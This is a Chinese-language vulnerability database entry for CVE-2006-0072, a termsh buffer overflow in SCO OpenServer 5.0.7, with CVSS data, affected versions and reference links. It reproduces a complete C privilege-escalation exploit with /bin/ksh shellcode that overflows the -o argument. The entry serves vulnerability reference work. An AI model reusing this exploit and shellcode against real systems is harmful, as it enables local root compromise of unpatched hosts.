CVE-2006-0072
CVSS7.5
发布时间 :2006-01-03 19:03:00
修订时间 :2008-09-05 16:58:16
NMCOE    

[原文]Buffer overflow in termsh on SCO OpenServer 5.0.7 allows remote attackers to execute arbitrary code via a long -o command line argument. NOTE: this is probably a different vulnerability than CVE-2005-0351 since it involves a distinct attack vector.


[CNNVD]SCO OpenServer Termsh缓冲区溢出漏洞(CNNVD-200601-009)

        SCO OpenServer是中小企业业务最流行的Unix服务器平台。
        SCO OpenServer termsh应用中存在本地溢出漏洞。攻击者可能利用这个漏洞获得权限提升。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:sco:openserver:5.0.5
cpe:/o:sco:openserver:5.0.3
cpe:/o:sco:openserver:5.0
cpe:/o:sco:openserver:5.0.6
cpe:/o:sco:openserver:5.0.7
cpe:/o:sco:openserver:5.0.1
cpe:/o:sco:openserver:5.0.6a
cpe:/o:sco:openserver:5.0.2
cpe:/o:sco:openserver:5.0.4

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0072
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0072
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200601-009
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/16122
(UNKNOWN)  BID  16122
http://www.securityfocus.com/archive/1/420677
(UNKNOWN)  BUGTRAQ  20060102 SCO Openserver 5.0.x exploit
http://downloads.securityfocus.com/vulnerabilities/exploits/Openserver_bof.c
(UNKNOWN)  MISC  http://downloads.securityfocus.com/vulnerabilities/exploits/Openserver_bof.c

- 漏洞信息

SCO OpenServer Termsh缓冲区溢出漏洞
高危 缓冲区溢出
2006-01-03 00:00:00 2006-05-12 00:00:00
本地  
        SCO OpenServer是中小企业业务最流行的Unix服务器平台。
        SCO OpenServer termsh应用中存在本地溢出漏洞。攻击者可能利用这个漏洞获得权限提升。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        www.caldera.com/products/openserver/

- 漏洞信息 (1402)

SCO Openserver 5.0.7 (termsh) Local Privilege Escalation Exploit (EDBID:1402)
sco local
2006-01-03 Verified
0 prdelka
N/A [点击下载]
/* SCO Openserver 5.0.7 termsh exploit
 * ===================================
 * 'termsh' is a program to view or modify an existing terminal entry on
 * SCO Openserver. A stack based overflow exists in the handling of command
 * line arguements, namely the [-o oadir] arguement. It is installed setgid
 * auth in a default SCO Openserver 5.0.7 install. An attacker may use this
 * flaw to gain write access to /etc/passwd or /etc/shadow  allowing for
 * local root compromise.
 *
 * Example use.
 * $ id
 * uid=200(user) gid=50(group) groups=50(group)
 * $ uname -a
 * SCO_SV scosysv 3.2 5.0.7 i386
 * $ gcc prdelka-vs-SCO-termshx.c -o prdelka-vs-SCO-termshx
 * $ ./prdelka-vs-SCO-termshx /opt/K/SCO/Unix/5.0.7Hw/usr/lib/sysadm/termsh
 * [ SCO Openserver 5.0.7 termsh local privilege escalation exploit
 * $ id
 * uid=200(user) gid=50(group) egid=21(auth) groups=50(group)
 *
 * - prdelka
 */
#include <stdio.h>
#include <stdlib.h>

char shellcode[]="\x90\x90\x90\x90\x90\x90\x90\x90"
                 "\x68\xff\xf8\xff\x3c\x6a\x65\x89"
                 "\xe6\xf7\x56\x04\xf6\x16\x31\xc0"
                 "\x50\x68""/ksh""\x68""/bin""\x89"
                 "\xe3\x50\x50\x53\xb0\x3b\xff\xd6";

int main(int argc,char* argv[])
{
        char* buffer;
        char* arg = "-o";
        char *env[] = {"HISTORY=/dev/null",NULL};
        long eip,ptr;
        int i;
        printf("[ SCO Openserver 5.0.7 termsh local privilege escalation exploit\n");
        if(argc < 2)
        {
                printf("[ Error  : [path]\n[ Example: %s /opt/K/SCO/Unix/5.0.7Hw/usr/lib/sysadm/termsh\n",argv[0]);
                exit(0);
        }
        eip = 0xa2080853;
        buffer = malloc(7449 + strlen(shellcode));
        memset(buffer,'\x00',7449 + strlen(shellcode));
        ptr = (long)buffer + strlen(shellcode);
        strncpy(buffer,shellcode,strlen(shellcode));
        for(i = 1;i <= 1862;i++)
        {
                memcpy((char*)ptr,(char*)&eip,4);
                ptr = ptr + 4;
        }
        execle(argv[1],argv[1],arg,buffer,NULL,env);
        exit(0);
}

// milw0rm.com [2006-01-03]
		

- 漏洞信息

22217
SCO OpenServer termsh -o Parameter Local Overflow
Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2006-01-02 Unknow
2006-01-02 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站